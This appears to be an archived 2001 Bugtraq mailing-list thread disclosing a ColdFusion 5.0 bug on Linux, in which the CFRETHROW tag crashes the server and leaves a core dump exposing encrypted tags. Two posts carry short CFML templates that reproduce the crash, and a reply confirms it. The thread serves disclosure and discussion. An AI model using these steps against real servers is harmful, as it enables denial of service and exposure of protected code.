6823158 2001-07-30 22:19 -0500 /82 rader/ Eric Lackey <eric@isdn.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-31 17:43 av Brevbäraren
Extern mottagare: 'bugtraq@securityfocus.com' <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <18529>
Ärende: cold fusion 5.0 cfrethrow exploit
------------------------------------------------------------
From: Eric Lackey <eric@isdn.net>
To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Message-ID: <01B712429915D511803600A0C99AB3A7057FA8@isdnnt02.office.isdn.net>
Vulnerable:
Cold Fusion 5.0
Invulnerable:
Versions of Cold Fusion below 5.0 do not seem to have the same problem.
OS:
Only tried on RedHat Linus 2.4.2-2 #1
Allaire reports a Cold Fusion bug that can be found at this address:
http://www.allaire.com/Handlers/index.cfm?ID=17560&Method=Full. The
bug happens only on Linux. The text from the bug report is below.
The CFRETHROW tag causes a server restart on Linux.
You can work around this problem by using a CFTHROW tag:
======================================================
Most of the time using the cfrethrow tag in Cold Fusion 5.0 will
cause the server to crash with the message:
Error Diagnostic Information An error occurred while attempting to
establish a connection to the server.
The most likely cause of this problem is that the server is not
currently running. Verify that the server is running and restart it
if necessary.
Unix error number 2 occurred: No such file or directory
When this happens, the Cold Fusion server core dumps its memory into
a core file in the /$installdir/coldfusion/logs directory. By using
the strings command on this file, anyone can see all memory used by
Cold Fusion before the server crashed. All encrypted and unencrypted
tags that the cf server was using can be seen in clear text in this
core dump.
This vulnerability can be easily reproduced by using Cold Fusion 5 and two
Cold Fusion templates.
Create two files, file1.cfm and file2.cfm. Within file1.cfm put the
following code.
--------------------------
<CFTRY>
<CFINCLUDE TEMPLATE="test2.cfm">
<CFCATCH>
Call encrypted tag or include template here
<CFRETHROW>
</CFCATCH>
</CFTRY>
--------------------------
Within file2.cfm put the following code.
--------------------------
<CFTHROW MESSAGE="TEST">
--------------------------
Call any custom tag or template that you want to see in clear text
right after the cfcatch tag. Then call test.cfm from a web browser
and the server should then crash. It might take a couple of
refreshes to make the server crash.
This vulnerability will allow anyone to view any Cold Fusion
encrypted tags. I am aware of another program identified on Bugtraq
that gives anyone the ability to decrypt encrypted tags. I thought
some might be interested that there is another exploit.
----------------------------
Eric Lackey
ISDN-Net Operations
eric@isdn.net
(6823158) /Eric Lackey <eric@isdn.net>/---(Ombruten)
6823498 2001-07-31 11:39 -0400 /96 rader/ Johnson, Michael <Michael.Johnson@ASTStockplan.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-31 18:55 av Brevbäraren
Extern mottagare: 'Eric Lackey' <eric@isdn.net>
Extern mottagare: 'bugtraq@securityfocus.com' <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <18532>
Ärende: RE: cold fusion 5.0 cfrethrow exploit
------------------------------------------------------------
From: "Johnson, Michael" <Michael.Johnson@ASTStockplan.com>
To: 'Eric Lackey' <eric@isdn.net>,
"'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Message-ID: <5BA9C874D66DD511860600034708613E6BF794@MAIL01>
Anyone seen a proof of concept for the 'huge allaire exploit' that
they are telling everyone to put that patch on for? I think its a
hoax as I have not seen it yet ...just some marketing ploy to get
everyone to upgrade...
-MJ?
-----Original Message-----
From: Eric Lackey [mailto:eric@isdn.net]
Sent: Monday, July 30, 2001 11:20 PM
To: 'bugtraq@securityfocus.com'
Subject: cold fusion 5.0 cfrethrow exploit
Vulnerable:
Cold Fusion 5.0
Invulnerable:
Versions of Cold Fusion below 5.0 do not seem to have the same problem.
OS:
Only tried on RedHat Linus 2.4.2-2 #1
Allaire reports a Cold Fusion bug that can be found at this address:
http://www.allaire.com/Handlers/index.cfm?ID=17560&Method=Full. The
bug happens only on Linux. The text from the bug report is below.
The CFRETHROW tag causes a server restart on Linux.
You can work around this problem by using a CFTHROW tag:
======================================================
Most of the time using the cfrethrow tag in Cold Fusion 5.0 will
cause the server to crash with the message:
Error Diagnostic Information An error occurred while attempting to
establish a connection to the server.
The most likely cause of this problem is that the server is not
currently running. Verify that the server is running and restart it
if necessary.
Unix error number 2 occurred: No such file or directory
When this happens, the Cold Fusion server core dumps its memory into
a core file in the /$installdir/coldfusion/logs directory. By using
the strings command on this file, anyone can see all memory used by
Cold Fusion before the server crashed. All encrypted and unencrypted
tags that the cf server was using can be seen in clear text in this
core dump.
This vulnerability can be easily reproduced by using Cold Fusion 5 and two
Cold Fusion templates.
Create two files, file1.cfm and file2.cfm. Within file1.cfm put the
following code.
--------------------------
<CFTRY>
<CFINCLUDE TEMPLATE="test2.cfm">
<CFCATCH>
Call encrypted tag or include template here
<CFRETHROW>
</CFCATCH>
</CFTRY>
--------------------------
Within file2.cfm put the following code.
--------------------------
<CFTHROW MESSAGE="TEST">
--------------------------
Call any custom tag or template that you want to see in clear text
right after the cfcatch tag. Then call test.cfm from a web browser
and the server should then crash. It might take a couple of
refreshes to make the server crash.
This vulnerability will allow anyone to view any Cold Fusion
encrypted tags. I am aware of another program identified on Bugtraq
that gives anyone the ability to decrypt encrypted tags. I thought
some might be interested that there is another exploit.
----------------------------
Eric Lackey
ISDN-Net Operations
eric@isdn.net
(6823498) /Johnson, Michael <Michael.Johnson@ASTStockplan.com>/(Ombruten)
Kommentar i text 6823965 av Jeff Palmer <scorpio@drkshdw.org>
6823965 2001-07-31 13:39 -0400 /42 rader/ Jeff Palmer <scorpio@drkshdw.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-31 20:56 av Brevbäraren
Extern mottagare: Johnson, Michael <Michael.Johnson@ASTStockplan.com>
Extern kopiemottagare: 'Eric Lackey' <eric@isdn.net>
Extern kopiemottagare: 'bugtraq@securityfocus.com' <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <18537>
Kommentar till text 6823498 av Johnson, Michael <Michael.Johnson@ASTStockplan.com>
Ärende: RE: cold fusion 5.0 cfrethrow exploit
------------------------------------------------------------
From: Jeff Palmer <scorpio@drkshdw.org>
To: "Johnson, Michael" <Michael.Johnson@ASTStockplan.com>
Cc: 'Eric Lackey' <eric@isdn.net>,
"'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Message-ID: <20010731133031.F3444-100000@jeff.isni.net>
> Anyone seen a proof of concept for the 'huge allaire exploit' that they are
> telling everyone to put that patch on for? I think its a hoax as I have not
> seen it yet ...just some marketing ploy to get everyone to upgrade...
>
> -MJ?
>
Let me start by saying I am not a ColdFusion programmer or anything
near there. I do however admin 2 RH servers for a company in texas
who use CF.
With permission, I have tested this exploit, and have verified it
works as advertised (restarts the CF server on redhat linux)
Once, apache crashed along with it (signal 11. It dumped core but I
didn't take time to debug why) Therefore it didn't restart. It
effectively killed the web server. (This happened once out of nearly
100 tests, on a devel box)
There are things you need to consider here.
#1) Most organizations still use the NT version of the server. So if
this was a marketing ploy, I'd assume allaire would show an NT
vulnerability?
#2) This exploit only affects systems where users have write access to a
website. If your server only offers access to developers, you are not
vulnerable (Unless you upset one of your employees, in which case, you
have many more problems than a simple server restart)
Regards,
Jeff Palmer
scorpio@drkshdw.org
(6823965) /Jeff Palmer <scorpio@drkshdw.org>/(Ombruten)